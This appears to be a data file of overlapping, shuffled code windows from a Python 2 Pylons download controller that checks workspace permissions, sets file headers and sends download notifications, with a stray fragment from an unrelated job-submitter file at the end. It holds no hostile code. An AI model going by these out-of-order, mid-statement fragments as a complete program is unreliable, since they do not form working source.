"import KfsNode from kwmo.lib.kwmo_kcd_client import KcdClient from kwmo.lib.config import get_cached_kcd_external_conf_object log = logging.getLogger(__name__)",
"else: log.debug(\"Not sending download notification: user is admin: workspace_id=%i, user_id=%i.\" % \\ (",
"workspace_id=%i, user_id=%i.\" % \\ ( workspace_id, user_id ) ) return kfs_download_generator(kcd_conf, kfs_node.workspace_id, kfs_node.share_id,",
"a file. def download(self, workspace_id): workspace_id = int(workspace_id) # Shortcuts share_id = 0",
"the right permissions.\") # FIXME download permission error: get rid of 403 error:",
"and not c.is_admin: # Check that the user has rights to download from",
"'save') ctype = None if mode == 'open': # Guest mime type import",
"download notifications. send_notification = True # Download a file. def download(self, workspace_id): workspace_id",
"from kwmo.lib.file_download import kfs_download_generator from kwmo.model.kfs_node import KfsNode from kwmo.lib.kwmo_kcd_client import KcdClient from",
"if not kfs_dir_parent: raise Exception(\"Public workspace file download: bad directory(2).\") if kfs_dir_parent.parent_inode_id !=",
"will be replaced in a middleware (workaround for # the Content-Length header being",
"= session['user']['id'] kcd_conf = get_cached_kcd_external_conf_object() # Permissions verification if not c.perms.hasPerm('kfs.download.share.%i' % (share_id)):",
"'public' if self.send_notification: # Send download notification to KCD. pubws_email_id = 0 if",
"on IE. response.headers['Cache-Control'] = 'maxage=3600' response.headers['Pragma'] = 'public' if self.send_notification: # Send download",
"# Guest mime type import mimetypes ctype, cencoding = mimetypes.guess_type(kfs_node.name, False) # not",
"Permissions verification if not c.perms.hasPerm('kfs.download.share.%i' % (share_id)): log.error(\"File download denied: user has not",
"if self.send_notification: # Send download notification to KCD. pubws_email_id = 0 if c.workspace.public:",
"path. kfs_dir = kfs_node.parent if not kfs_dir: raise Exception(\"Public workspace file download: bad",
"cencoding = mimetypes.guess_type(kfs_node.name, True) # strict if not ctype: # Download mime type",
"str('attachment; filename=\"%s\"' % ( kfs_node.name.encode('latin1') )) response.headers['Content-Transfer-Encoding'] = 'binary' # Use a custom",
"user_id, kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id, pubws_email_id) log.debug((\"Sent download notification: workspace_id=%i, user_id=%i, share_id=%i\" + \\",
"the user has rights to download from this path. kfs_dir = kfs_node.parent if",
"(workaround for # the Content-Length header being dropped somewhere in pylons). response.headers['X-Content-Length'] =",
"error: get rid of 403 error: send an errror file? return abort(403) #",
"None) kfs_files = [kfs_node.to_dict()] # Set the content type and the headers. response.headers['Content-Type']",
"# Send download notifications. send_notification = True # Download a file. def download(self,",
"if c.workspace.public and not c.is_admin: # Check that the user has rights to",
"web_kfs_file.share_id == share_id # Get the kfs node associted to it. kfs_node =",
"strict if not ctype: # Download mime type ctype, cencoding = ('application/octet-stream', None)",
"Download mime type ctype, cencoding = ('application/octet-stream', None) kfs_files = [kfs_node.to_dict()] # Set",
"pylons import request, response, session,config, tmpl_context as c from pylons.controllers.util import abort, redirect_to",
"mode == 'open': # Guest mime type import mimetypes ctype, cencoding = mimetypes.guess_type(kfs_node.name,",
"# Get download mode. mode = request.params.get('mode', 'save') ctype = None if mode",
"!= expected_dir_name: raise Exception(\"Public workspace file download: bad directory(1).\") kfs_dir_parent = kfs_dir.parent if",
"= mimetypes.guess_type(kfs_node.name, False) # not strict #ctype, cencoding = mimetypes.guess_type(kfs_node.name, True) # strict",
"get_cached_kcd_external_conf_object log = logging.getLogger(__name__) class FileDownloadController(BaseController): requires_auth = ['download'] # Send download notifications.",
"log = logging.getLogger(__name__) class FileDownloadController(BaseController): requires_auth = ['download'] # Send download notifications. send_notification",
"Exception(\"Public workspace file download: bad directory(2).\") if kfs_dir_parent.parent_inode_id != KFS_ROOT_INODE_ID: raise Exception(\"Public workspace",
"False) # not strict #ctype, cencoding = mimetypes.guess_type(kfs_node.name, True) # strict if not",
"pylons). response.headers['X-Content-Length'] = str(kfs_node.file_size) # These headers are necessary for the download to",
"work on IE. response.headers['Cache-Control'] = 'maxage=3600' response.headers['Pragma'] = 'public' if self.send_notification: # Send",
"notifications. send_notification = True # Download a file. def download(self, workspace_id): workspace_id =",
"# FIXME download permission error: get rid of 403 error: send an errror",
"ctype: # Download mime type ctype, cencoding = ('application/octet-stream', None) kfs_files = [kfs_node.to_dict()]",
"= map(lambda x: x['email'], session['identities']) if kfs_dir_parent.name not in identities_emails: raise Exception(\"Public workspace",
"not kfs_dir: raise Exception(\"Public workspace file download: bad directory(0).\") if kfs_dir.name == \"Original",
"BaseController, render from kfs_lib import * from kwmo.lib.file_download import kfs_download_generator from kwmo.model.kfs_node import",
"user_id, kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id, pubws_email_id ) ) except Exception, e: log.error(\"Sending download notification",
"verification if not c.perms.hasPerm('kfs.download.share.%i' % (share_id)): log.error(\"File download denied: user has not the",
"download: bad directory(0).\") if kfs_dir.name == \"Original attachments\": kfs_dir = kfs_dir.parent expected_dir_name =",
"KFS_ROOT_INODE_ID: raise Exception(\"Public workspace file download: bad directory(3).\"); identities_emails = map(lambda x: x['email'],",
"mode. mode = request.params.get('mode', 'save') ctype = None if mode == 'open': #",
"kc = KcdClient(kcd_conf) try: kc.send_download_notification(workspace_id, user_id, kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id, pubws_email_id) log.debug((\"Sent download notification:",
"an errror file? return abort(403) # Get kfs_file object from request. web_kfs_file_json =",
"are necessary for the download to work on IE. response.headers['Cache-Control'] = 'maxage=3600' response.headers['Pragma']",
"be replaced in a middleware (workaround for # the Content-Length header being dropped",
"Exception, e: log.error(\"Sending download notification failed: '%s'.\" % ( str(e) ) ) else:",
"= kfs_dir.parent if not kfs_dir_parent: raise Exception(\"Public workspace file download: bad directory(2).\") if",
"Exception(\"Public workspace file download: bad directory(1).\") kfs_dir_parent = kfs_dir.parent if not kfs_dir_parent: raise",
"= mimetypes.guess_type(kfs_node.name, True) # strict if not ctype: # Download mime type ctype,",
"str(e) ) ) else: log.debug(\"Not sending download notification: user is admin: workspace_id=%i, user_id=%i.\"",
"file download: bad directory(0).\") if kfs_dir.name == \"Original attachments\": kfs_dir = kfs_dir.parent expected_dir_name",
"e: log.error(\"Sending download notification failed: '%s'.\" % ( str(e) ) ) else: log.debug(\"Not",
"file download: bad directory(3).\"); identities_emails = map(lambda x: x['email'], session['identities']) if kfs_dir_parent.name not",
"notification: workspace_id=%i, user_id=%i, share_id=%i\" + \\ \", inode_id=%i, commit_id=%i, pubws_email_id=%i.\") % \\ (",
"= simplejson.loads(web_kfs_file_json) web_kfs_file = WebKFSFile().from_dict(web_kfs_file_dict) assert web_kfs_file.workspace_id == workspace_id assert web_kfs_file.share_id == share_id",
"kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id, pubws_email_id ) ) except Exception, e: log.error(\"Sending download notification failed:",
"import request, response, session,config, tmpl_context as c from pylons.controllers.util import abort, redirect_to from",
"inode_id=web_kfs_file.inode_id) if c.workspace.public and not c.is_admin: # Check that the user has rights",
"workspace_id assert web_kfs_file.share_id == share_id # Get the kfs node associted to it.",
"response.headers['Content-Encoding'] = cencoding response.headers['Content-disposition'] = str('attachment; filename=\"%s\"' % ( kfs_node.name.encode('latin1') )) response.headers['Content-Transfer-Encoding'] =",
"raise Exception(\"Public workspace file download: bad directory(4).\"); # Get download mode. mode =",
"= str('attachment; filename=\"%s\"' % ( kfs_node.name.encode('latin1') )) response.headers['Content-Transfer-Encoding'] = 'binary' # Use a",
"from kwmo.lib.config import get_cached_kcd_external_conf_object log = logging.getLogger(__name__) class FileDownloadController(BaseController): requires_auth = ['download'] #",
"file download: bad directory(2).\") if kfs_dir_parent.parent_inode_id != KFS_ROOT_INODE_ID: raise Exception(\"Public workspace file download:",
"workspace file download: bad directory(4).\"); # Get download mode. mode = request.params.get('mode', 'save')",
"type import mimetypes ctype, cencoding = mimetypes.guess_type(kfs_node.name, False) # not strict #ctype, cencoding",
"in identities_emails: raise Exception(\"Public workspace file download: bad directory(4).\"); # Get download mode.",
"right permissions.\") # FIXME download permission error: get rid of 403 error: send",
"'maxage=3600' response.headers['Pragma'] = 'public' if self.send_notification: # Send download notification to KCD. pubws_email_id",
"\\ \", inode_id=%i, commit_id=%i, pubws_email_id=%i.\") % \\ ( workspace_id, user_id, kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id,",
"Send download notifications. send_notification = True # Download a file. def download(self, workspace_id):",
"workspace_id): workspace_id = int(workspace_id) # Shortcuts share_id = 0 user_id = session['user']['id'] kcd_conf",
"notification to KCD. pubws_email_id = 0 if c.workspace.public: pubws_email_id = session['email_id'] kc =",
"send_notification = True # Download a file. def download(self, workspace_id): workspace_id = int(workspace_id)",
"from pylons import request, response, session,config, tmpl_context as c from pylons.controllers.util import abort,",
"response.headers['X-Content-Length'] = str(kfs_node.file_size) # These headers are necessary for the download to work",
"user_id=%i, share_id=%i\" + \\ \", inode_id=%i, commit_id=%i, pubws_email_id=%i.\") % \\ ( workspace_id, user_id,",
"True) # strict if not ctype: # Download mime type ctype, cencoding =",
"session['email_id'] kc = KcdClient(kcd_conf) try: kc.send_download_notification(workspace_id, user_id, kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id, pubws_email_id) log.debug((\"Sent download",
"= 'public' if self.send_notification: # Send download notification to KCD. pubws_email_id = 0",
"kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id, pubws_email_id) log.debug((\"Sent download notification: workspace_id=%i, user_id=%i, share_id=%i\" + \\ \",",
"share_id = 0 user_id = session['user']['id'] kcd_conf = get_cached_kcd_external_conf_object() # Permissions verification if",
"the download to work on IE. response.headers['Cache-Control'] = 'maxage=3600' response.headers['Pragma'] = 'public' if",
") except Exception, e: log.error(\"Sending download notification failed: '%s'.\" % ( str(e) )",
"cencoding = ('application/octet-stream', None) kfs_files = [kfs_node.to_dict()] # Set the content type and",
"error: send an errror file? return abort(403) # Get kfs_file object from request.",
"for # the Content-Length header being dropped somewhere in pylons). response.headers['X-Content-Length'] = str(kfs_node.file_size)",
"header that will be replaced in a middleware (workaround for # the Content-Length",
"= 0 if c.workspace.public: pubws_email_id = session['email_id'] kc = KcdClient(kcd_conf) try: kc.send_download_notification(workspace_id, user_id,",
"kfs node associted to it. kfs_node = KfsNode.get_by(workspace_id=workspace_id, share_id=web_kfs_file.share_id, inode_id=web_kfs_file.inode_id) if c.workspace.public and",
"if mode == 'open': # Guest mime type import mimetypes ctype, cencoding =",
"not c.is_admin: # Check that the user has rights to download from this",
"# strict if not ctype: # Download mime type ctype, cencoding = ('application/octet-stream',",
"content type and the headers. response.headers['Content-Type'] = ctype #if cencoding: # response.headers['Content-Encoding'] =",
"not kfs_dir_parent: raise Exception(\"Public workspace file download: bad directory(2).\") if kfs_dir_parent.parent_inode_id != KFS_ROOT_INODE_ID:",
"Use a custom header that will be replaced in a middleware (workaround for",
"import KcdClient from kwmo.lib.config import get_cached_kcd_external_conf_object log = logging.getLogger(__name__) class FileDownloadController(BaseController): requires_auth =",
"web_kfs_file = WebKFSFile().from_dict(web_kfs_file_dict) assert web_kfs_file.workspace_id == workspace_id assert web_kfs_file.share_id == share_id # Get",
"KCD. pubws_email_id = 0 if c.workspace.public: pubws_email_id = session['email_id'] kc = KcdClient(kcd_conf) try:",
"expected_dir_name = get_kfs_skurl_subject(session['email_info']['date'], session['email_info']['subject']) if kfs_dir.name != expected_dir_name: raise Exception(\"Public workspace file download:",
"ctype, cencoding = mimetypes.guess_type(kfs_node.name, False) # not strict #ctype, cencoding = mimetypes.guess_type(kfs_node.name, True)",
"= kfs_dir.parent expected_dir_name = get_kfs_skurl_subject(session['email_info']['date'], session['email_info']['subject']) if kfs_dir.name != expected_dir_name: raise Exception(\"Public workspace",
"self.send_notification: # Send download notification to KCD. pubws_email_id = 0 if c.workspace.public: pubws_email_id",
"Check that the user has rights to download from this path. kfs_dir =",
"redirect_to from kwmo.lib.base import BaseController, render from kfs_lib import * from kwmo.lib.file_download import",
"kfs_node.commit_id, pubws_email_id) log.debug((\"Sent download notification: workspace_id=%i, user_id=%i, share_id=%i\" + \\ \", inode_id=%i, commit_id=%i,",
"download denied: user has not the right permissions.\") # FIXME download permission error:",
"int(workspace_id) # Shortcuts share_id = 0 user_id = session['user']['id'] kcd_conf = get_cached_kcd_external_conf_object() #",
"# Download mime type ctype, cencoding = ('application/octet-stream', None) kfs_files = [kfs_node.to_dict()] #",
"necessary for the download to work on IE. response.headers['Cache-Control'] = 'maxage=3600' response.headers['Pragma'] =",
"= WebKFSFile().from_dict(web_kfs_file_dict) assert web_kfs_file.workspace_id == workspace_id assert web_kfs_file.share_id == share_id # Get the",
"rights to download from this path. kfs_dir = kfs_node.parent if not kfs_dir: raise",
"download notification to KCD. pubws_email_id = 0 if c.workspace.public: pubws_email_id = session['email_id'] kc",
"KfsNode from kwmo.lib.kwmo_kcd_client import KcdClient from kwmo.lib.config import get_cached_kcd_external_conf_object log = logging.getLogger(__name__) class",
"download permission error: get rid of 403 error: send an errror file? return",
"Guest mime type import mimetypes ctype, cencoding = mimetypes.guess_type(kfs_node.name, False) # not strict",
"return abort(403) # Get kfs_file object from request. web_kfs_file_json = request.params.get('kfs_file') web_kfs_file_dict =",
"# Set the content type and the headers. response.headers['Content-Type'] = ctype #if cencoding:",
"time from pylons import request, response, session,config, tmpl_context as c from pylons.controllers.util import",
"workspace file download: bad directory(2).\") if kfs_dir_parent.parent_inode_id != KFS_ROOT_INODE_ID: raise Exception(\"Public workspace file",
"= request.params.get('mode', 'save') ctype = None if mode == 'open': # Guest mime",
"permission error: get rid of 403 error: send an errror file? return abort(403)",
"Send download notification to KCD. pubws_email_id = 0 if c.workspace.public: pubws_email_id = session['email_id']",
"logging.getLogger(__name__) class FileDownloadController(BaseController): requires_auth = ['download'] # Send download notifications. send_notification = True",
"import BaseController, render from kfs_lib import * from kwmo.lib.file_download import kfs_download_generator from kwmo.model.kfs_node",
"file download: bad directory(1).\") kfs_dir_parent = kfs_dir.parent if not kfs_dir_parent: raise Exception(\"Public workspace",
"the kfs node associted to it. kfs_node = KfsNode.get_by(workspace_id=workspace_id, share_id=web_kfs_file.share_id, inode_id=web_kfs_file.inode_id) if c.workspace.public",
"replaced in a middleware (workaround for # the Content-Length header being dropped somewhere",
"log.debug(\"Not sending download notification: user is admin: workspace_id=%i, user_id=%i.\" % \\ ( workspace_id,",
"if kfs_dir.name == \"Original attachments\": kfs_dir = kfs_dir.parent expected_dir_name = get_kfs_skurl_subject(session['email_info']['date'], session['email_info']['subject']) if",
"session,config, tmpl_context as c from pylons.controllers.util import abort, redirect_to from kwmo.lib.base import BaseController,",
"log.error(\"Sending download notification failed: '%s'.\" % ( str(e) ) ) else: log.debug(\"Not sending",
"= str(kfs_node.file_size) # These headers are necessary for the download to work on",
"notification: user is admin: workspace_id=%i, user_id=%i.\" % \\ ( workspace_id, user_id ) )",
"directory(4).\"); # Get download mode. mode = request.params.get('mode', 'save') ctype = None if",
"header being dropped somewhere in pylons). response.headers['X-Content-Length'] = str(kfs_node.file_size) # These headers are",
"def download(self, workspace_id): workspace_id = int(workspace_id) # Shortcuts share_id = 0 user_id =",
"map(lambda x: x['email'], session['identities']) if kfs_dir_parent.name not in identities_emails: raise Exception(\"Public workspace file",
"= kfs_node.parent if not kfs_dir: raise Exception(\"Public workspace file download: bad directory(0).\") if",
"request.params.get('kfs_file') web_kfs_file_dict = simplejson.loads(web_kfs_file_json) web_kfs_file = WebKFSFile().from_dict(web_kfs_file_dict) assert web_kfs_file.workspace_id == workspace_id assert web_kfs_file.share_id",
"session['user']['id'] kcd_conf = get_cached_kcd_external_conf_object() # Permissions verification if not c.perms.hasPerm('kfs.download.share.%i' % (share_id)): log.error(\"File",
"= 'maxage=3600' response.headers['Pragma'] = 'public' if self.send_notification: # Send download notification to KCD.",
"# Download a file. def download(self, workspace_id): workspace_id = int(workspace_id) # Shortcuts share_id",
"filename=\"%s\"' % ( kfs_node.name.encode('latin1') )) response.headers['Content-Transfer-Encoding'] = 'binary' # Use a custom header",
"simplejson import time from pylons import request, response, session,config, tmpl_context as c from",
"None if mode == 'open': # Guest mime type import mimetypes ctype, cencoding",
"kwmo.lib.kwmo_kcd_client import KcdClient from kwmo.lib.config import get_cached_kcd_external_conf_object log = logging.getLogger(__name__) class FileDownloadController(BaseController): requires_auth",
"c.workspace.public: pubws_email_id = session['email_id'] kc = KcdClient(kcd_conf) try: kc.send_download_notification(workspace_id, user_id, kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id,",
"not the right permissions.\") # FIXME download permission error: get rid of 403",
"headers are necessary for the download to work on IE. response.headers['Cache-Control'] = 'maxage=3600'",
"kwmo.lib.base import BaseController, render from kfs_lib import * from kwmo.lib.file_download import kfs_download_generator from",
"from kwmo.model.kfs_node import KfsNode from kwmo.lib.kwmo_kcd_client import KcdClient from kwmo.lib.config import get_cached_kcd_external_conf_object log",
"user is admin: workspace_id=%i, user_id=%i.\" % \\ ( workspace_id, user_id ) ) return",
"workspace_id, user_id, kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id, pubws_email_id ) ) except Exception, e: log.error(\"Sending download",
"kcd_conf = get_cached_kcd_external_conf_object() # Permissions verification if not c.perms.hasPerm('kfs.download.share.%i' % (share_id)): log.error(\"File download",
"kfs_node.inode_id, kfs_node.commit_id, pubws_email_id) log.debug((\"Sent download notification: workspace_id=%i, user_id=%i, share_id=%i\" + \\ \", inode_id=%i,",
"kwmo.model.kfs_node import KfsNode from kwmo.lib.kwmo_kcd_client import KcdClient from kwmo.lib.config import get_cached_kcd_external_conf_object log =",
"kfs_dir.parent expected_dir_name = get_kfs_skurl_subject(session['email_info']['date'], session['email_info']['subject']) if kfs_dir.name != expected_dir_name: raise Exception(\"Public workspace file",
"== workspace_id assert web_kfs_file.share_id == share_id # Get the kfs node associted to",
"the headers. response.headers['Content-Type'] = ctype #if cencoding: # response.headers['Content-Encoding'] = cencoding response.headers['Content-disposition'] =",
"in pylons). response.headers['X-Content-Length'] = str(kfs_node.file_size) # These headers are necessary for the download",
"if c.workspace.public: pubws_email_id = session['email_id'] kc = KcdClient(kcd_conf) try: kc.send_download_notification(workspace_id, user_id, kfs_node.share_id, kfs_node.inode_id,",
"import * from kwmo.lib.file_download import kfs_download_generator from kwmo.model.kfs_node import KfsNode from kwmo.lib.kwmo_kcd_client import",
"commit_id=%i, pubws_email_id=%i.\") % \\ ( workspace_id, user_id, kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id, pubws_email_id ) )",
"session['identities']) if kfs_dir_parent.name not in identities_emails: raise Exception(\"Public workspace file download: bad directory(4).\");",
"= KfsNode.get_by(workspace_id=workspace_id, share_id=web_kfs_file.share_id, inode_id=web_kfs_file.inode_id) if c.workspace.public and not c.is_admin: # Check that the",
"kfs_node = KfsNode.get_by(workspace_id=workspace_id, share_id=web_kfs_file.share_id, inode_id=web_kfs_file.inode_id) if c.workspace.public and not c.is_admin: # Check that",
"# Use a custom header that will be replaced in a middleware (workaround",
"kfs_file object from request. web_kfs_file_json = request.params.get('kfs_file') web_kfs_file_dict = simplejson.loads(web_kfs_file_json) web_kfs_file = WebKFSFile().from_dict(web_kfs_file_dict)",
"if kfs_dir.name != expected_dir_name: raise Exception(\"Public workspace file download: bad directory(1).\") kfs_dir_parent =",
"strict #ctype, cencoding = mimetypes.guess_type(kfs_node.name, True) # strict if not ctype: # Download",
"import abort, redirect_to from kwmo.lib.base import BaseController, render from kfs_lib import * from",
"not ctype: # Download mime type ctype, cencoding = ('application/octet-stream', None) kfs_files =",
"request. web_kfs_file_json = request.params.get('kfs_file') web_kfs_file_dict = simplejson.loads(web_kfs_file_json) web_kfs_file = WebKFSFile().from_dict(web_kfs_file_dict) assert web_kfs_file.workspace_id ==",
"import simplejson import time from pylons import request, response, session,config, tmpl_context as c",
"request.params.get('mode', 'save') ctype = None if mode == 'open': # Guest mime type",
"import mimetypes ctype, cencoding = mimetypes.guess_type(kfs_node.name, False) # not strict #ctype, cencoding =",
"inode_id=%i, commit_id=%i, pubws_email_id=%i.\") % \\ ( workspace_id, user_id, kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id, pubws_email_id )",
") ) else: log.debug(\"Not sending download notification: user is admin: workspace_id=%i, user_id=%i.\" %",
"web_kfs_file.workspace_id == workspace_id assert web_kfs_file.share_id == share_id # Get the kfs node associted",
"raise Exception(\"Public workspace file download: bad directory(0).\") if kfs_dir.name == \"Original attachments\": kfs_dir",
"pubws_email_id) log.debug((\"Sent download notification: workspace_id=%i, user_id=%i, share_id=%i\" + \\ \", inode_id=%i, commit_id=%i, pubws_email_id=%i.\")",
"headers. response.headers['Content-Type'] = ctype #if cencoding: # response.headers['Content-Encoding'] = cencoding response.headers['Content-disposition'] = str('attachment;",
"get_cached_kcd_external_conf_object() # Permissions verification if not c.perms.hasPerm('kfs.download.share.%i' % (share_id)): log.error(\"File download denied: user",
"user has rights to download from this path. kfs_dir = kfs_node.parent if not",
"= KcdClient(kcd_conf) try: kc.send_download_notification(workspace_id, user_id, kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id, pubws_email_id) log.debug((\"Sent download notification: workspace_id=%i,",
"try: kc.send_download_notification(workspace_id, user_id, kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id, pubws_email_id) log.debug((\"Sent download notification: workspace_id=%i, user_id=%i, share_id=%i\"",
"# the Content-Length header being dropped somewhere in pylons). response.headers['X-Content-Length'] = str(kfs_node.file_size) #",
"from kwmo.lib.base import BaseController, render from kfs_lib import * from kwmo.lib.file_download import kfs_download_generator",
"not strict #ctype, cencoding = mimetypes.guess_type(kfs_node.name, True) # strict if not ctype: #",
"tmpl_context as c from pylons.controllers.util import abort, redirect_to from kwmo.lib.base import BaseController, render",
"= None if mode == 'open': # Guest mime type import mimetypes ctype,",
"to work on IE. response.headers['Cache-Control'] = 'maxage=3600' response.headers['Pragma'] = 'public' if self.send_notification: #",
"= session['email_id'] kc = KcdClient(kcd_conf) try: kc.send_download_notification(workspace_id, user_id, kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id, pubws_email_id) log.debug((\"Sent",
"log.debug((\"Sent download notification: workspace_id=%i, user_id=%i, share_id=%i\" + \\ \", inode_id=%i, commit_id=%i, pubws_email_id=%i.\") %",
"kfs_dir_parent.name not in identities_emails: raise Exception(\"Public workspace file download: bad directory(4).\"); # Get",
"c from pylons.controllers.util import abort, redirect_to from kwmo.lib.base import BaseController, render from kfs_lib",
"= logging.getLogger(__name__) class FileDownloadController(BaseController): requires_auth = ['download'] # Send download notifications. send_notification =",
"type ctype, cencoding = ('application/octet-stream', None) kfs_files = [kfs_node.to_dict()] # Set the content",
"Exception(\"Public workspace file download: bad directory(0).\") if kfs_dir.name == \"Original attachments\": kfs_dir =",
"download: bad directory(4).\"); # Get download mode. mode = request.params.get('mode', 'save') ctype =",
"from kwmo.lib.kwmo_kcd_client import KcdClient from kwmo.lib.config import get_cached_kcd_external_conf_object log = logging.getLogger(__name__) class FileDownloadController(BaseController):",
"c.workspace.public and not c.is_admin: # Check that the user has rights to download",
"to download from this path. kfs_dir = kfs_node.parent if not kfs_dir: raise Exception(\"Public",
"render from kfs_lib import * from kwmo.lib.file_download import kfs_download_generator from kwmo.model.kfs_node import KfsNode",
"identities_emails = map(lambda x: x['email'], session['identities']) if kfs_dir_parent.name not in identities_emails: raise Exception(\"Public",
"it. kfs_node = KfsNode.get_by(workspace_id=workspace_id, share_id=web_kfs_file.share_id, inode_id=web_kfs_file.inode_id) if c.workspace.public and not c.is_admin: # Check",
"response.headers['Content-Type'] = ctype #if cencoding: # response.headers['Content-Encoding'] = cencoding response.headers['Content-disposition'] = str('attachment; filename=\"%s\"'",
"denied: user has not the right permissions.\") # FIXME download permission error: get",
"% ( str(e) ) ) else: log.debug(\"Not sending download notification: user is admin:",
"associted to it. kfs_node = KfsNode.get_by(workspace_id=workspace_id, share_id=web_kfs_file.share_id, inode_id=web_kfs_file.inode_id) if c.workspace.public and not c.is_admin:",
")) response.headers['Content-Transfer-Encoding'] = 'binary' # Use a custom header that will be replaced",
"from request. web_kfs_file_json = request.params.get('kfs_file') web_kfs_file_dict = simplejson.loads(web_kfs_file_json) web_kfs_file = WebKFSFile().from_dict(web_kfs_file_dict) assert web_kfs_file.workspace_id",
"kfs_dir = kfs_dir.parent expected_dir_name = get_kfs_skurl_subject(session['email_info']['date'], session['email_info']['subject']) if kfs_dir.name != expected_dir_name: raise Exception(\"Public",
"has not the right permissions.\") # FIXME download permission error: get rid of",
"bad directory(1).\") kfs_dir_parent = kfs_dir.parent if not kfs_dir_parent: raise Exception(\"Public workspace file download:",
"#ctype, cencoding = mimetypes.guess_type(kfs_node.name, True) # strict if not ctype: # Download mime",
"mime type ctype, cencoding = ('application/octet-stream', None) kfs_files = [kfs_node.to_dict()] # Set the",
"not in identities_emails: raise Exception(\"Public workspace file download: bad directory(4).\"); # Get download",
"= ctype #if cencoding: # response.headers['Content-Encoding'] = cencoding response.headers['Content-disposition'] = str('attachment; filename=\"%s\"' %",
"directory(1).\") kfs_dir_parent = kfs_dir.parent if not kfs_dir_parent: raise Exception(\"Public workspace file download: bad",
"dropped somewhere in pylons). response.headers['X-Content-Length'] = str(kfs_node.file_size) # These headers are necessary for",
"share_id # Get the kfs node associted to it. kfs_node = KfsNode.get_by(workspace_id=workspace_id, share_id=web_kfs_file.share_id,",
"middleware (workaround for # the Content-Length header being dropped somewhere in pylons). response.headers['X-Content-Length']",
"cencoding: # response.headers['Content-Encoding'] = cencoding response.headers['Content-disposition'] = str('attachment; filename=\"%s\"' % ( kfs_node.name.encode('latin1') ))",
"import get_cached_kcd_external_conf_object log = logging.getLogger(__name__) class FileDownloadController(BaseController): requires_auth = ['download'] # Send download",
"x: x['email'], session['identities']) if kfs_dir_parent.name not in identities_emails: raise Exception(\"Public workspace file download:",
"logging import simplejson import time from pylons import request, response, session,config, tmpl_context as",
"requires_auth = ['download'] # Send download notifications. send_notification = True # Download a",
"= get_cached_kcd_external_conf_object() # Permissions verification if not c.perms.hasPerm('kfs.download.share.%i' % (share_id)): log.error(\"File download denied:",
"if not kfs_dir: raise Exception(\"Public workspace file download: bad directory(0).\") if kfs_dir.name ==",
"True # Download a file. def download(self, workspace_id): workspace_id = int(workspace_id) # Shortcuts",
"except Exception, e: log.error(\"Sending download notification failed: '%s'.\" % ( str(e) ) )",
"request, response, session,config, tmpl_context as c from pylons.controllers.util import abort, redirect_to from kwmo.lib.base",
"Content-Length header being dropped somewhere in pylons). response.headers['X-Content-Length'] = str(kfs_node.file_size) # These headers",
"admin: workspace_id=%i, user_id=%i.\" % \\ ( workspace_id, user_id ) ) return kfs_download_generator(kcd_conf, kfs_node.workspace_id,",
"# Get the kfs node associted to it. kfs_node = KfsNode.get_by(workspace_id=workspace_id, share_id=web_kfs_file.share_id, inode_id=web_kfs_file.inode_id)",
"== share_id # Get the kfs node associted to it. kfs_node = KfsNode.get_by(workspace_id=workspace_id,",
"kfs_dir = kfs_node.parent if not kfs_dir: raise Exception(\"Public workspace file download: bad directory(0).\")",
"pubws_email_id = session['email_id'] kc = KcdClient(kcd_conf) try: kc.send_download_notification(workspace_id, user_id, kfs_node.share_id, kfs_node.inode_id, kfs_node.commit_id, pubws_email_id)",
"of 403 error: send an errror file? return abort(403) # Get kfs_file object",
"# not strict #ctype, cencoding = mimetypes.guess_type(kfs_node.name, True) # strict if not ctype:",
"assert web_kfs_file.share_id == share_id # Get the kfs node associted to it. kfs_node",
"if kfs_dir_parent.name not in identities_emails: raise Exception(\"Public workspace file download: bad directory(4).\"); #",
"response.headers['Cache-Control'] = 'maxage=3600' response.headers['Pragma'] = 'public' if self.send_notification: # Send download notification to",
"import logging import simplejson import time from pylons import request, response, session,config, tmpl_context",
"pubws_email_id = 0 if c.workspace.public: pubws_email_id = session['email_id'] kc = KcdClient(kcd_conf) try: kc.send_download_notification(workspace_id,",
"WebKFSFile().from_dict(web_kfs_file_dict) assert web_kfs_file.workspace_id == workspace_id assert web_kfs_file.share_id == share_id # Get the kfs",
"bad directory(2).\") if kfs_dir_parent.parent_inode_id != KFS_ROOT_INODE_ID: raise Exception(\"Public workspace file download: bad directory(3).\");",
"kfs_dir_parent = kfs_dir.parent if not kfs_dir_parent: raise Exception(\"Public workspace file download: bad directory(2).\")",
"KfsNode.get_by(workspace_id=workspace_id, share_id=web_kfs_file.share_id, inode_id=web_kfs_file.inode_id) if c.workspace.public and not c.is_admin: # Check that the user",
"'open': # Guest mime type import mimetypes ctype, cencoding = mimetypes.guess_type(kfs_node.name, False) #",
"= [kfs_node.to_dict()] # Set the content type and the headers. response.headers['Content-Type'] = ctype",
"and the headers. response.headers['Content-Type'] = ctype #if cencoding: # response.headers['Content-Encoding'] = cencoding response.headers['Content-disposition']",
"share_id=web_kfs_file.share_id, inode_id=web_kfs_file.inode_id) if c.workspace.public and not c.is_admin: # Check that the user has",
"raise Exception(\"Public workspace file download: bad directory(2).\") if kfs_dir_parent.parent_inode_id != KFS_ROOT_INODE_ID: raise Exception(\"Public",
"to KCD. pubws_email_id = 0 if c.workspace.public: pubws_email_id = session['email_id'] kc = KcdClient(kcd_conf)",
"in a middleware (workaround for # the Content-Length header being dropped somewhere in",
"response.headers['Content-disposition'] = str('attachment; filename=\"%s\"' % ( kfs_node.name.encode('latin1') )) response.headers['Content-Transfer-Encoding'] = 'binary' # Use",
"# These headers are necessary for the download to work on IE. response.headers['Cache-Control']",
"download notification failed: '%s'.\" % ( str(e) ) ) else: log.debug(\"Not sending download"
] |
[
"{ 'mopro_directory': self.mopro_directory, 'submitter_host': self.host, 'submitter_port': self.port, 'tmp_dir': self.tmp_dir } try: if isinstance(job,",
